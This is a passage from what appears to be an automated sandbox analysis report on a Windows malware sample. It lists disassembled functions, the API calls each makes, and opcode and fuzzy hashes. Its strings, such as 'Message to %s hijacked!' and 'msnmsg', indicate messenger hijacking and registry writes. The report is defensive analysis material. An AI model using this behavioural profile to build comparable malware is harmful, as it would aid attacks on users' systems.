                                                                  • API ID: lstrlen$CloseCreateHandleThread_snprintf_vsnprintfmemset
                                                                  • String ID: admin$isadmin
                                                                  • API String ID: 3136305548-1977506819
                                                                  • Opcode ID: 57f7f2dc3323355822e39b8ba528c58f351f3f1db7047b6f3c70ba5457c83b17
                                                                  • Instruction ID: b107a2e10d2fb19f7efaea747b012742f6e31fcdf6c0b367857be0add983cbcc
                                                                  • Opcode Fuzzy Hash: 57f7f2dc3323355822e39b8ba528c58f351f3f1db7047b6f3c70ba5457c83b17
                                                                  • Instruction Fuzzy Hash: 0ED0C9B67D434176F13327A05D0FF4A22485724F06F608410F708AD1C5A5D4209045AA
                                                                  Function 00402880 Relevance: 6.2, APIs: 4, Instructions: 164networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402460: GetProcessHeap.KERNEL32(?,004020DE,?), ref: 0040246C
                                                                    • Part of subcall function 00402460: HeapAlloc.KERNEL32(?,00000008,004020DE,?,004020DE,?), ref: 0040247E
                                                                  • inet_addr.WS2_32(?), ref: 004028BE
                                                                  • DnsQuery_A.DNSAPI(?,00000001,00000008,00000000,?,00000000), ref: 00402939
                                                                  • _stricmp.MSVCRT(?,?,?), ref: 0040294E
                                                                  • DnsFree.DNSAPI(?,00000001), ref: 004029D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFreeProcessQuery__stricmpinet_addr
                                                                  • String ID:
                                                                  • API String ID: 3002912770-0
                                                                  • Opcode ID: a5b975686055a6ad762db3198c48b653122c65071bde79865f0daa47f409934a
                                                                  • Instruction ID: 7b4bcac95eda314589689d5efbf7f5d85f6b8a6c39ee2f63de8762e6eb4cb817
                                                                  • Opcode Fuzzy Hash: a5b975686055a6ad762db3198c48b653122c65071bde79865f0daa47f409934a
                                                                  • Instruction Fuzzy Hash: 865190B07002049FD720DF69CA89B6AB3A5AF85704F20447EE585AB3C0E7B9AD41CB95
                                                                  Function 00362880 Relevance: 6.2, APIs: 4, Instructions: 164networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00362460: GetProcessHeap.KERNEL32(?,003620DE,?), ref: 0036246C
                                                                    • Part of subcall function 00362460: HeapAlloc.KERNEL32(?,00000008,003620DE,?,003620DE,?), ref: 0036247E
                                                                  • inet_addr.WS2_32(?), ref: 003628BE
                                                                  • DnsQuery_A.DNSAPI(?,00000001,00000008,00000000,?,00000000), ref: 00362939
                                                                  • _stricmp.MSVCRT(?,?,?), ref: 0036294E
                                                                  • DnsFree.DNSAPI(?,00000001), ref: 003629D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFreeProcessQuery__stricmpinet_addr
                                                                  • String ID:
                                                                  • API String ID: 3002912770-0
                                                                  • Opcode ID: 128c85f33ad911fe7a03449ef6004437af08643368f8472f6286ec65596a95c8
                                                                  • Instruction ID: 00c3ba536de1955ddffff6f271b909699f91df514c0fd8375ffa0fd9ae3b76c2
                                                                  • Opcode Fuzzy Hash: 128c85f33ad911fe7a03449ef6004437af08643368f8472f6286ec65596a95c8
                                                                  • Instruction Fuzzy Hash: B951C170600A009FD722DF59C881B6BB7F5FF86704F228459E9899B388EB71ED51CB91
                                                                  Function 00408F50 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ApplyControlToken.SECUR32(?,?), ref: 00408FB5
                                                                  • InitializeSecurityContextA.SECUR32(?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00408FF9
                                                                  • DeleteSecurityContext.SECUR32(?,?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00409025
                                                                  • FreeCredentialsHandle.SECUR32(?), ref: 0040902F
                                                                    • Part of subcall function 00408760: FreeContextBuffer.SECUR32(?), ref: 00408774
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Context$FreeSecurity$ApplyBufferControlCredentialsDeleteHandleInitializeToken
                                                                  • String ID:
                                                                  • API String ID: 362823901-0
                                                                  • Opcode ID: 2380779ca4936bf24da35008e120283aa08c8bc45cf506c596155f6e4fe055a8
                                                                  • Instruction ID: 597c2a7369eb59e50f1a6720c39724f21d20c383529a429c7ed2b113d5fceb98
                                                                  • Opcode Fuzzy Hash: 2380779ca4936bf24da35008e120283aa08c8bc45cf506c596155f6e4fe055a8
                                                                  • Instruction Fuzzy Hash: 3141D9B1C002099BCB10DF9AC9859EEFBFCFF98304F10851EE515B3251D7B9A9448B64
                                                                  Function 00368F50 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ApplyControlToken.SECUR32(?,?), ref: 00368FB5
                                                                  • InitializeSecurityContextA.SECUR32(?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00368FF9
                                                                  • DeleteSecurityContext.SECUR32(?,?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00369025
                                                                  • FreeCredentialsHandle.SECUR32(?), ref: 0036902F
                                                                    • Part of subcall function 00368760: FreeContextBuffer.SECUR32(?), ref: 00368774
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Context$FreeSecurity$ApplyBufferControlCredentialsDeleteHandleInitializeToken
                                                                  • String ID:
                                                                  • API String ID: 362823901-0
                                                                  • Opcode ID: 2ebc5b50b501c0180b1875c673685d0df52d8f7e7bf2e359bf60a4482bd331c6
                                                                  • Instruction ID: 9ed278ad4ab893974de07bd37f210538e0c120ce99783a7c0ac72dc68fc1d1ba
                                                                  • Opcode Fuzzy Hash: 2ebc5b50b501c0180b1875c673685d0df52d8f7e7bf2e359bf60a4482bd331c6
                                                                  • Instruction Fuzzy Hash: 2C41E8B1C00609ABCB11DF9AC885AEFFBFCFF98304F10850EE515A7615D7B5A6448BA4
                                                                  Function 00404900 Relevance: 6.1, APIs: 4, Instructions: 93synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(00407495,000000FF,?,00000000,756F59EB,?,00407495), ref: 00404939
                                                                  • ReleaseMutex.KERNEL32(?,?,00407495), ref: 0040497C
                                                                  • ReleaseMutex.KERNEL32(-0000FFFF,?,00407495), ref: 004049A5
                                                                  • ReleaseMutex.KERNEL32(00407495,?,00407495), ref: 004049D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 257779224-0
                                                                  • Opcode ID: 63b75c3b539f6d5a62ae21cdc0f351efb8da632d2bdbb001c1f598c76031e3ef
                                                                  • Instruction ID: 60a01da9d8e12490b98d0435c3672651bd769e7b273c693051a5ec76faa180d4
                                                                  • Opcode Fuzzy Hash: 63b75c3b539f6d5a62ae21cdc0f351efb8da632d2bdbb001c1f598c76031e3ef
                                                                  • Instruction Fuzzy Hash: 5A2151F12012068BDB209F75E844BA777A9EFC4364B19457BEB88D7290D738DC51CB94
                                                                  Function 004049F0 Relevance: 6.1, APIs: 4, Instructions: 93synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,004073CC,00437C98,00000000,00000000,00000010,00000000), ref: 00404A10
                                                                  • ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 00404A77
                                                                  • ReleaseMutex.KERNEL32(?,?,?,00000000), ref: 00404AA9
                                                                  • ReleaseMutex.KERNEL32(?,00000000), ref: 00404ABC
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 257779224-0
                                                                  • Opcode ID: 63d3ffe026840b187cbe0a3bca9a3e1a2581093c4aa0e4f7d61f639895044d6a
                                                                  • Instruction ID: 9de7bc225a4f11a468762aa64ff5b90ab43fa89967ea14f2f024b3cc108ef4f2
                                                                  • Opcode Fuzzy Hash: 63d3ffe026840b187cbe0a3bca9a3e1a2581093c4aa0e4f7d61f639895044d6a
                                                                  • Instruction Fuzzy Hash: 1A2182B23041055BDB10DE69EC80AAB73A9AFC0754715453BFE48A7390E738ED418AAC
                                                                  Function 00364900 Relevance: 6.1, APIs: 4, Instructions: 93synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(00367495,000000FF,?,00000000,756F59EB,?,00367495), ref: 00364939
                                                                  • ReleaseMutex.KERNEL32(?,?,00367495), ref: 0036497C
                                                                  • ReleaseMutex.KERNEL32(-0000FFFF,?,00367495), ref: 003649A5
                                                                  • ReleaseMutex.KERNEL32(00367495,?,00367495), ref: 003649D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 257779224-0
                                                                  • Opcode ID: a8a89f764e2dbbdcf2b55b5a43e79f50761cddd439196c77f1593fd035183e25
                                                                  • Instruction ID: f2eabd33349a1f8064d77dc747188ab3b564af08a83140195bbd3b6a3c4762bb
                                                                  • Opcode Fuzzy Hash: a8a89f764e2dbbdcf2b55b5a43e79f50761cddd439196c77f1593fd035183e25
                                                                  • Instruction Fuzzy Hash: C021B732A40206CFDB229F69E8457A773EDFF41364F1A8526E588C7248EB31DC51C790
                                                                  Function 003649F0 Relevance: 6.1, APIs: 4, Instructions: 93synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,003673CC,00397C98,00000000,00000000,00000010,00000000), ref: 00364A10
                                                                  • ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 00364A77
                                                                  • ReleaseMutex.KERNEL32(?,?,?,00000000), ref: 00364AA9
                                                                  • ReleaseMutex.KERNEL32(?,00000000), ref: 00364ABC
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 257779224-0
                                                                  • Opcode ID: 0b030351a1a372c4b29af558933cbc94818ddea5d6cac9a0aca502d10c18ebd7
                                                                  • Instruction ID: bfdfd9af8d3bb25493b364b254ad337d51e6a32dbb6a93411bb8b5020b51b588
                                                                  • Opcode Fuzzy Hash: 0b030351a1a372c4b29af558933cbc94818ddea5d6cac9a0aca502d10c18ebd7
                                                                  • Instruction Fuzzy Hash: 82210B72B04104ABDB12DFA9EC806AA73ADEF81754B15C12AFC48CB344EB30DD4187D4
                                                                  Function 004011C0 Relevance: 6.1, APIs: 4, Instructions: 77threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 004011E1
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 00401201
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000208), ref: 00401241
                                                                  • ExitThread.KERNEL32 ref: 00401261
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesByteCharExitFileMultiThreadWidememset
                                                                  • String ID:
                                                                  • API String ID: 1389112251-0
                                                                  • Opcode ID: e7413f48adbe43255a1fc25b920de3f2242b57c17ef6b082db6c1c638d69bb54
                                                                  • Instruction ID: 9c09465909980defebf6fc1bf24d1c266cb80464f9af9b5b5def457f6c2ce4cf
                                                                  • Opcode Fuzzy Hash: e7413f48adbe43255a1fc25b920de3f2242b57c17ef6b082db6c1c638d69bb54
                                                                  • Instruction Fuzzy Hash: A0215E76200208BBDB10DF55EC49FEB7778EB89711F004269FE19A3291DB34AD51CBA9
                                                                  Function 003611C0 Relevance: 6.1, APIs: 4, Instructions: 77threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003611E1
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 00361201
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000208), ref: 00361241
                                                                  • ExitThread.KERNEL32 ref: 00361261
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesByteCharExitFileMultiThreadWidememset
                                                                  • String ID:
                                                                  • API String ID: 1389112251-0
                                                                  • Opcode ID: fb4741ae20c2f6256a78d77b0f7e2f904540e4c12fd95859a6489aea7cd0f836
                                                                  • Instruction ID: 7e3d9fe416b71ef9f6e86ad108e427176332970e98d469a90866ae52860cee51
                                                                  • Opcode Fuzzy Hash: fb4741ae20c2f6256a78d77b0f7e2f904540e4c12fd95859a6489aea7cd0f836
                                                                  • Instruction Fuzzy Hash: CF214976600208ABDB21DF58EC49FEB377CEB89711F048219FE1997281DA30A951CBA1
                                                                  Function 0040D6B0 Relevance: 6.1, APIs: 4, Instructions: 74registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 0040D6FD
                                                                  • RegSetValueExW.ADVAPI32 ref: 0040D731
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040D740
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040D753
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Close$CreateValue
                                                                  • String ID:
                                                                  • API String ID: 1009429713-0
                                                                  • Opcode ID: 023a06ccce26f21a6eb4b1cf29a7a46dec0311a4eb8ff73b697b9a0322046531
                                                                  • Instruction ID: 4ebeea118ffc0b70507ed0453d9bb896cfbcfcc1ebea939967c067b9dbd2b579
                                                                  • Opcode Fuzzy Hash: 023a06ccce26f21a6eb4b1cf29a7a46dec0311a4eb8ff73b697b9a0322046531
                                                                  • Instruction Fuzzy Hash: 80216075B40209BBDB14CF94DC46FAB7778EB88B44F108154FA05AB2D4E6B4FA049BA4
                                                                  Function 0036D6B0 Relevance: 6.1, APIs: 4, Instructions: 74registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 0036D6FD
                                                                  • RegSetValueExW.ADVAPI32 ref: 0036D731
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0036D740
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0036D753
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Close$CreateValue
                                                                  • String ID:
                                                                  • API String ID: 1009429713-0
                                                                  • Opcode ID: 95c5dbd3d92bb1850e7a90f7c2a034308502273076e0f28e310bcf74bca53e93
                                                                  • Instruction ID: 843a82d1db2b9105b45bfeb4396ab9fd7e484dde1a8d96a49add43420b27f062
                                                                  • Opcode Fuzzy Hash: 95c5dbd3d92bb1850e7a90f7c2a034308502273076e0f28e310bcf74bca53e93
                                                                  • Instruction Fuzzy Hash: 26214275740209BBDB25CF98DC46FBA737CEB88B44F108144FA09AB284E670FA40D7A0
                                                                  Function 00407EF0 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLocal$closesocket
                                                                  • String ID:
                                                                  • API String ID: 1824021853-0
                                                                  • Opcode ID: 0d7af23abec9eedd371e7df087b943542a0927854f9a33720e7b197f5bd49994
                                                                  • Instruction ID: 58c757484c17e8af9c5a96bfa26f79bf23742db81f14522f08cab0e5839f8174
                                                                  • Opcode Fuzzy Hash: 0d7af23abec9eedd371e7df087b943542a0927854f9a33720e7b197f5bd49994
                                                                  • Instruction Fuzzy Hash: 46015E32B042109FC721DF59E88499A73A9FF8976531404BAF648DB350C635EC41CBA4
                                                                  Function 00367EF0 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLocal$closesocket
                                                                  • String ID:
                                                                  • API String ID: 1824021853-0
                                                                  • Opcode ID: ed64155edab9cc5f89a01ce21938d326648141ccbbf90e4e61e8a07cfd8fb8fe
                                                                  • Instruction ID: 4d08ffde4f98b3df19c2e72958bb7b5d119660bf228ae2dd0a422a98c21768da
                                                                  • Opcode Fuzzy Hash: ed64155edab9cc5f89a01ce21938d326648141ccbbf90e4e61e8a07cfd8fb8fe
                                                                  • Instruction Fuzzy Hash: 95011A367052149FC722DE69E884C9AB3A9FF8976535544AAF548CF319C631EC41CBA0
                                                                  Function 0040A800 Relevance: 6.0, APIs: 4, Instructions: 49stringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strchr$CountSleepTick
                                                                  • String ID:
                                                                  • API String ID: 735077530-0
                                                                  • Opcode ID: 5b989edbec9fb57e2c91f01ace7b0e21f16f3518f0f45a2d65738c978c86f70f
                                                                  • Instruction ID: 12bd840c873a94c867595e1b095c0c34b8311daa37525659d88b801d5309ee5b
                                                                  • Opcode Fuzzy Hash: 5b989edbec9fb57e2c91f01ace7b0e21f16f3518f0f45a2d65738c978c86f70f
                                                                  • Instruction Fuzzy Hash: D9F0497720030067D310B666DC87ECA739ECBC8366F00843AFA0997381E9BDDD4242BA
                                                                  Function 0036A800 Relevance: 6.0, APIs: 4, Instructions: 49stringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strchr$CountSleepTick
                                                                  • String ID:
                                                                  • API String ID: 735077530-0
                                                                  • Opcode ID: 1f86faceedf30533f19246ff7ce9a17c7cc809abcec4e85aec530aabacea605c
                                                                  • Instruction ID: f9200f9a9193a792e8eab8451fcfee1917c0776fedc8997ef9778f4fc91278e2
                                                                  • Opcode Fuzzy Hash: 1f86faceedf30533f19246ff7ce9a17c7cc809abcec4e85aec530aabacea605c
                                                                  • Instruction Fuzzy Hash: 48F0F4B72003049BD722A2A49C8AA9A775ADBC4761F048428FA0D8B205E97ADE4546B6
                                                                  Function 0040A790 Relevance: 6.0, APIs: 4, Instructions: 44stringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strchr$CountSleepTick
                                                                  • String ID:
                                                                  • API String ID: 735077530-0
                                                                  • Opcode ID: a56deda88b7bfe3fcc912b37b26a7d9c041b97cb9979405d9c52ec78308d40e7
                                                                  • Instruction ID: 7d5eb4f3d2123dae37af85631522b7622fe4fdd3bec7fbc1b2475d13fce141a8
                                                                  • Opcode Fuzzy Hash: a56deda88b7bfe3fcc912b37b26a7d9c041b97cb9979405d9c52ec78308d40e7
                                                                  • Instruction Fuzzy Hash: 2DF0467340021167C230A666EC82ACBF79CDB88762F048576FE04AB352E47CDE8581FA
                                                                  Function 0036A790 Relevance: 6.0, APIs: 4, Instructions: 44stringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strchr$CountSleepTick
                                                                  • String ID:
                                                                  • API String ID: 735077530-0
                                                                  • Opcode ID: 27626f0b7e9faf6066d974cdae0b849791ac0ef2a5f45c61da8dae5afadfc686
                                                                  • Instruction ID: 82c6938b2294a733663e56ae344826dbd11ef67120489d4f240b8e8310374c37
                                                                  • Opcode Fuzzy Hash: 27626f0b7e9faf6066d974cdae0b849791ac0ef2a5f45c61da8dae5afadfc686
                                                                  • Instruction Fuzzy Hash: 4DF02BB350111167C23266A9EC86A8BB79CDB80761F058575FE09AF202E56C9E4485F2
                                                                  Function 0040A080 Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040A0A2
                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040A0C0
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A0CB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A0D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFileHandle$CreateWrite
                                                                  • String ID:
                                                                  • API String ID: 3602564925-0
                                                                  • Opcode ID: 468fddb27519cf46e4d5856843bc9a79975d9738623fcc55b54f1ea553afb210
                                                                  • Instruction ID: fe0a8d23ea9a6e4fc406740f8b7308c2032c4cdff1c410b5fcd8361f48a0f6c0
                                                                  • Opcode Fuzzy Hash: 468fddb27519cf46e4d5856843bc9a79975d9738623fcc55b54f1ea553afb210
                                                                  • Instruction Fuzzy Hash: FAF0C271240208BBE3209F98EC09FDB77A8EB4D720F008264FF09E72D0D6B06C0087A9
                                                                  Function 0036A080 Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0036A0A2
                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0036A0C0
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036A0CB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036A0D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFileHandle$CreateWrite
                                                                  • String ID:
                                                                  • API String ID: 3602564925-0
                                                                  • Opcode ID: 2180a4de2e3e1478059c40d10c2abd9015b08a486b10120ab9403fdfe39ec506
                                                                  • Instruction ID: c90f325fee7a3014e6974ad6d957c777c781512bb19dd41f40f7bb3c7e37b98f
                                                                  • Opcode Fuzzy Hash: 2180a4de2e3e1478059c40d10c2abd9015b08a486b10120ab9403fdfe39ec506
                                                                  • Instruction Fuzzy Hash: FEF06272251214BBE7209B9CEC09F9A37ACEB49764F504254FE08EB3C0EA716D4487A5
                                                                  Function 00410880 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 40stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00404900: WaitForSingleObject.KERNEL32(00407495,000000FF,?,00000000,756F59EB,?,00407495), ref: 00404939
                                                                    • Part of subcall function 00404900: ReleaseMutex.KERNEL32(?,?,00407495), ref: 0040497C
                                                                  • lstrlenA.KERNEL32(00000000,00000000,%s.p10-> Message to %s hijacked!,msn), ref: 004108B1
                                                                    • Part of subcall function 00407330: memset.MSVCRT ref: 00407351
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(?), ref: 00407369
                                                                    • Part of subcall function 00407330: _snprintf.MSVCRT ref: 00407381
                                                                    • Part of subcall function 00407330: _vsnprintf.MSVCRT ref: 004073A3
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(00000000), ref: 004073B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$MutexObjectReleaseSingleWait_snprintf_vsnprintfmemset
                                                                  • String ID: %s_0x%08X$bmsn$msnmsg
                                                                  • API String ID: 1310428588-4225137719
                                                                  • Opcode ID: a24c34962bf9afaa6b58a18db10be76bedf8668f5e161a17a09eb47ecdbfd054
                                                                  • Instruction ID: 55a3b949f430f830e01e55d8eab2ca20a34dc41e3933f8760a51994ad7eb43cc
                                                                  • Opcode Fuzzy Hash: a24c34962bf9afaa6b58a18db10be76bedf8668f5e161a17a09eb47ecdbfd054
                                                                  • Instruction Fuzzy Hash: 86F08972B451183AE6206699AC02FEF764CC741765F540167FD08F6241D9A9595043E9
                                                                  Function 00370880 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 40stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00364900: WaitForSingleObject.KERNEL32(00367495,000000FF,?,00000000,756F59EB,?,00367495), ref: 00364939
                                                                    • Part of subcall function 00364900: ReleaseMutex.KERNEL32(?,?,00367495), ref: 0036497C
                                                                  • lstrlenA.KERNEL32(00000000,00000000,%s.p10-> Message to %s hijacked!,msn), ref: 003708B1
                                                                    • Part of subcall function 00367330: memset.MSVCRT ref: 00367351
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(?), ref: 00367369
                                                                    • Part of subcall function 00367330: _snprintf.MSVCRT ref: 00367381
                                                                    • Part of subcall function 00367330: _vsnprintf.MSVCRT ref: 003673A3
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(00000000), ref: 003673B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
